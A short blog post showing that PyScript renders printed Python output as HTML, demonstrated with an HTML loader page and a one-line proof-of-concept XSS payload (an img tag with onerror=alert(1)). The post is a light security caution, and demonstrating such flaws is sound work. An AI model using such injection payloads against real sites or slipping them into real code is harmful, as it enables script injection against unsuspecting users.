DEV Community

Artur Balsam
Artur Balsam

Posted on

PyScript XSS

#xss #security #python #pyscript

Run XSS in Your browser

With additional steps

Intro

Last month Anaconda, release the PyScript https://github.com/pyscript/pyscript. Simplifying: The Python in browser, with HTML and JavaScript. Javascript and python, in the browser,. What can possibly can go wrong.

DISCLAIMER: It's fun post, pyscript is great idea, but as everything, security should be some concern.

PyScript XSS

Let's check how it works:
index.html

<!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" href="https://pyscript.net/alpha/pyscript.css" />
        <script defer src="https://pyscript.net/alpha/pyscript.js"></script>
    </head>
    <body>
        <py-script src="/test.py"></py-script>
    </body>
</html>
Enter fullscreen mode Exit fullscreen mode

test.py

print('as<img src=x onerror=alert(1)>df')
Enter fullscreen mode Exit fullscreen mode

and here we are, with XSS:

Image description

Outro

Make no mistake, The PyScript, is brilliant product! Just don't forget about security.

Top comments (0)

Read next

rym_michaut profile image

9 Open-Source Tools to Build Better Data Apps in 2025

Rym -

mayurbhatti profile image

Setting up WireGuard VPN with WAG for Enhanced Security and MFA

Mayur Bhatti -

linediconsine profile image

Quick and Dirty Guide to Running a Local LLM and Making API Requests

Marco -

shahzaibhaider profile image

π–€π—‡π–Όπ—‹π—’π—‰π—π—‚π—ˆπ—‡ 𝖺𝗇𝖽 π–§π–Ίπ—Œπ—π—‚π—‡π—€: π–§π—ˆπ— 𝖳𝗁𝖾𝗒 π–―π—‹π—ˆπ—π–Ύπ–Όπ— π–Έπ—ˆπ—Žπ—‹ 𝖣𝖺𝗍𝖺 𝖣𝗂𝖿𝖿𝖾𝗋𝖾𝗇𝗍𝗅𝗒

Shahzaib Haider -